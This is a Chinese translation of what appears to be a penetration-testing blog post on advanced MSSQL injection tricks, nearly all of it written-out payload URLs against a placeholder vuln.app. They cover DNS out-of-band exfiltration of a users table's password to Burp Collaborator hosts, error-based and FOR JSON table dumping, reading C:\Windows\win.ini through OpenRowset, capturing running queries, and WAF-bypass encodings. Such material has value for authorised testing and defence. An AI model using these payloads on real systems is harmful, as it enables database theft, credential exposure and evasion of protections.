tl;dr

本文列舉了幾種改進的MSSQL注入技巧，所有的攻擊向量都至少在三個最新版本的Microsoft SQL Server上進行了測試：2019、2017、2016SP2。

DNS Out-of-Band

如果遇到帶有禁用堆棧查詢的完全盲SQL注入，則可以通過函數(shù) fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable實現(xiàn)DNS帶外(OOB)數(shù)據(jù)泄露。

利用fn_xe_file_target_read_file()的例子：

https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))

權(quán)限:需要控制服務(wù)器權(quán)限。

fn_trace_gettable()例子:

https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))

權(quán)限:需要控制服務(wù)器權(quán)限。

Alternative Error-Based vectors

基于錯誤的SQL注入通常類似于?+AND+1=@@version–?等結(jié)構(gòu)，以及基于?OR?操作符的變體。包含此類表達式的查詢通常會被WAF阻止。為了繞過，可以使用%2b字符將字符串與特定函數(shù)調(diào)用的結(jié)果連接起來，該函數(shù)調(diào)用會在需要的數(shù)據(jù)上觸發(fā)數(shù)據(jù)類型轉(zhuǎn)換錯誤。

特定函數(shù)的例子：

SUSER_NAME()

USER_NAME()

PERMISSIONS()

DB_NAME()

FILE_NAME()

TYPE_NAME()

COL_NAME()

USER_NAME():的例子

https://vuln.app/getItem?id=1'%2buser_name(@@version)--

快速利用：在一個查詢中檢索整個表

有兩種簡單的方法可以在一個查詢中檢索表的全部內(nèi)容-使用FOR XML或FOR JSON子句。FOR XML子句需要指定的模式，如?raw?，因此JSON比較簡潔。

從當前數(shù)據(jù)庫檢索架構(gòu)、表和列的查詢：

https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--

基于錯誤的攻擊向量需要別名或名稱，因為沒有別名或名稱的表達式的輸出不能格式化為JSON。

https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--

Reading local files

使用OpenRowset()函數(shù)檢索本地文件C:\Windows\win.ini的例子：

https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+’C:\Windows\win.ini’,SINGLE_CLOB)+R(x)),null,null

基于錯誤的payload

https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--

權(quán)限：BULK選項需要“ADMINISTER BULK OPERATIONS ”或“ADMINISTER DATABASE BULK OPERATIONS”權(quán)限。

檢索當前查詢

可以從Access sys.dm_exec_Requests和sys.dm_exec_sql_text中檢索當前正在執(zhí)行的SQL查詢：

https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null

權(quán)限：如果user在服務(wù)器上擁有VIEW SERVER STATE權(quán)限，則用戶將看到SQL Server實例上正在執(zhí)行的所有會話；否則，user將僅看到當前會話。

繞過WAF的小技巧

一些特殊字符 %C2%85 или %C2%A0:

https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--

科學(xué)(0E)和十六進制(0x)表示法：

https://vuln.app/getItem?id=0eunion+select+null,@@version,null--

https://vuln.app/getItem?id=0xunion+select+null,@@version,null--

在From和列名之間使用句號代替空格：

https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--

\N分隔符：

https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--

原文：https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/